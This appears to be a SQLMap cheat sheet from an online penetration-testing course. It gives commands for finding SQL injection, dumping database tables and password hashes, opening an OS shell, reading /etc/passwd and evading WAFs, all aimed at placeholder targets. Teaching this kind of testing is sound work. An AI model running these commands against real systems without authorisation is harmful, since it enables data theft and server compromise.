Cybersecurity Tools Cheat Sheets: Quick Reference Commands and Techniques

SQLMap Cheat Sheet

38 enrolled

~185 min

05-01-2026

1 pt

Chapter Content

Deep dive into cybersecurity fundamentals

SQLMap Cheat Sheet

Complete SQL Injection Automation Reference

Detection • Enumeration • Data Extraction • Shell Access

📅 Updated: December 2024 • ⏱️ 20 min read • 🔧 SQLMap 1.8+

📑 Quick Navigation

Basic Usage Detection Enumeration Data Extraction OS Access WAF Bypass Optimization

What is SQLMap?

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database management systems including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, and many more.

SQLMap comes pre-installed on Kali Linux. Source code available at github.com/sqlmapproject/sqlmap.

📦 Installation

Kali Linux (Pre-installed)

sqlmap --version

pip Install

pip install sqlmap

From Git

git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap && python sqlmap.py

Update

sqlmap --update

🎯 Basic Usage

# Basic GET parameter test
sqlmap -u "http://<target>/page?id=1"

# POST request
sqlmap -u "http://<target>/login" --data="user=admin&pass=test"

# Test specific parameter
sqlmap -u "http://<target>/page?id=1&name=test" -p id

# From Burp request file
sqlmap -r request.txt

# Test with cookie
sqlmap -u "http://<target>/page?id=1" --cookie="PHPSESSID=abc123"

# Custom headers
sqlmap -u "http://<target>/api/data" --headers="Authorization: Bearer token123"

💡 Pro Tip

Save Burp Suite requests as files and use -r request.txt — this preserves all headers, cookies, and POST data automatically.

🔍 Detection Options

Flag	Description
--level=LEVEL	Test level (1-5, default 1). Higher = more tests
--risk=RISK	Risk level (1-3, default 1). Higher = riskier tests
-p PARAM	Test specific parameter only
--dbms=DBMS	Force specific DBMS (mysql, mssql, oracle, etc.)
--technique=TECH	Specify injection techniques (BEUSTQ)
--string=STRING	String that appears on true condition
--not-string=STRING	String that appears on false condition

Injection Techniques (--technique)

B	Boolean-based blind
E	Error-based
U	UNION query-based
S	Stacked queries
T	Time-based blind
Q	Inline queries

📊 Enumeration

Flag	Description
--banner	Retrieve DBMS banner
--current-user	Current database user
--current-db	Current database name
--is-dba	Check if user is DBA
--users	Enumerate database users
--passwords	Enumerate user password hashes
--privileges	Enumerate user privileges
--dbs	Enumerate databases
--tables	Enumerate tables
--columns	Enumerate columns
--schema	Enumerate entire schema
--count	Count entries in tables

💾 Data Extraction

Flag	Description
-D DB	Specify database name
-T TABLE	Specify table name
-C COLUMNS	Specify columns (comma-separated)
--dump	Dump table contents
--dump-all	Dump all databases
--start=N	Start from row N
--stop=N	Stop at row N
--where=COND	WHERE clause for dump
--sql-query=QUERY	Execute custom SQL query
--sql-shell	Interactive SQL shell

Common Extraction Workflow

# Step 1: List databases
sqlmap -u "http://<target>/page?id=1" --dbs

# Step 2: List tables in database
sqlmap -u "http://<target>/page?id=1" -D targetdb --tables

# Step 3: List columns in table
sqlmap -u "http://<target>/page?id=1" -D targetdb -T users --columns

# Step 4: Dump specific columns
sqlmap -u "http://<target>/page?id=1" -D targetdb -T users -C username,password --dump

# Dump entire table
sqlmap -u "http://<target>/page?id=1" -D targetdb -T users --dump

🖥️ OS Access

Flag	Description
--os-shell	Interactive OS shell
--os-cmd=CMD	Execute OS command
--os-pwn	Get OOB shell (Meterpreter/VNC)
--file-read=FILE	Read file from server
--file-write=LOCAL	Write local file to server
--file-dest=PATH	Destination path on server
--reg-read	Read Windows registry key

⚠️ OS Shell Requirements

OS access requires: stacked queries support, DBA privileges, and appropriate DBMS permissions (FILE privilege for MySQL, xp_cmdshell for MSSQL).

📤 Request Options

Flag	Description
-r FILE	Load request from file
--data=DATA	POST data string
--cookie=COOKIE	HTTP cookie value
--headers=HEADERS	Extra headers (newline separated)
--user-agent=UA	Custom User-Agent
--random-agent	Use random User-Agent
--referer=REFERER	Custom Referer header
--proxy=PROXY	Use proxy (http://host:port)
--tor	Use Tor network
--method=METHOD	Force HTTP method (GET/POST/PUT)

🛡️ WAF/IDS Bypass

Flag	Description
--tamper=TAMPER	Use tamper script(s)
--delay=SECONDS	Delay between requests
--timeout=SECONDS	Connection timeout
--retries=N	Retries on connection issues
--randomize=PARAM	Randomize parameter value
--safe-url=URL	URL to visit between tests
--safe-freq=N	Visit safe URL every N requests

Common Tamper Scripts

# Space bypass
space2comment, space2plus, space2randomblank

# Case manipulation
randomcase, uppercase, lowercase

# Encoding
base64encode, charencode, charunicodeencode

# Comment injection
between, equaltolike, commalessmid

# Database specific
modsecurityzeroversioned (MySQL), sp_password (MSSQL)

# Multiple tampers
--tamper="space2comment,randomcase,charencode"

⚡ Optimization

Flag	Description
--threads=N	Max concurrent threads (default 1)
--batch	Never ask for user input (use defaults)
--flush-session	Flush session files for target
--fresh-queries	Ignore cached query results
--null-connection	Don't retrieve page body (faster)
-o	Turn on optimization flags
-v LEVEL	Verbosity (0-6, default 1)

🔥 Common Attack Scenarios

# Full automatic scan
sqlmap -u "http://<target>/page?id=1" --batch --dbs

# Aggressive scan with all techniques
sqlmap -u "http://<target>/page?id=1" --level=5 --risk=3

# Test POST login form
sqlmap -u "http://<target>/login" --data="user=admin&pass=test" --dbs

# Test with authentication
sqlmap -u "http://<target>/api/data?id=1" --cookie="session=abc123" --dbs

# Dump passwords and crack them
sqlmap -u "http://<target>/page?id=1" --passwords --batch

# Get OS shell
sqlmap -u "http://<target>/page?id=1" --os-shell

# Read file from server
sqlmap -u "http://<target>/page?id=1" --file-read="/etc/passwd"

# WAF bypass scan
sqlmap -u "http://<target>/page?id=1" --tamper="space2comment,randomcase" --random-agent

📚 Additional Resources

💉 SQLMap Cheat Sheet Complete!

You now have a comprehensive reference for the most powerful SQL injection automation tool. From detection to data extraction to OS access, these commands are what penetration testers use to exploit database vulnerabilities.

Detection Enumeration Data Dump WAF Bypass OS Shell

Ready to exploit your next SQL injection!

Knowledge Validation

Demonstrate your understanding to earn points and progress

Chapter Question

What SQLMap flag is used to specify a target URL?

Your Answer

Read

Validate

Complete

Ready to track your progress?

Create a free account to save your progress, earn points, and access 170+ hands-on cybersecurity labs.

Start Learning Free

Cybersecurity Tools Cheat Sheets: Quick Reference Commands and Techniques

Chapter Content

SQLMap Cheat Sheet

📑 Quick Navigation

What is SQLMap?

📦 Installation

🎯 Basic Usage

🔍 Detection Options

Injection Techniques (--technique)

📊 Enumeration

💾 Data Extraction

Common Extraction Workflow

🖥️ OS Access

📤 Request Options

🛡️ WAF/IDS Bypass

Common Tamper Scripts

⚡ Optimization

🔥 Common Attack Scenarios

📚 Additional Resources

💉 SQLMap Cheat Sheet Complete!

Knowledge Validation

Ready to track your progress?

Course Progress

Course Chapters

Nmap Cheat Sheet

Hydra Cheat Sheet

Metasploit Cheat Sheet

Burp Suite Cheat Sheet

SQLMap Cheat Sheet

Gobuster Cheat Sheet

Nikto Cheat Sheet

John the Ripper Cheat Sheet

Hashcat Cheat Sheet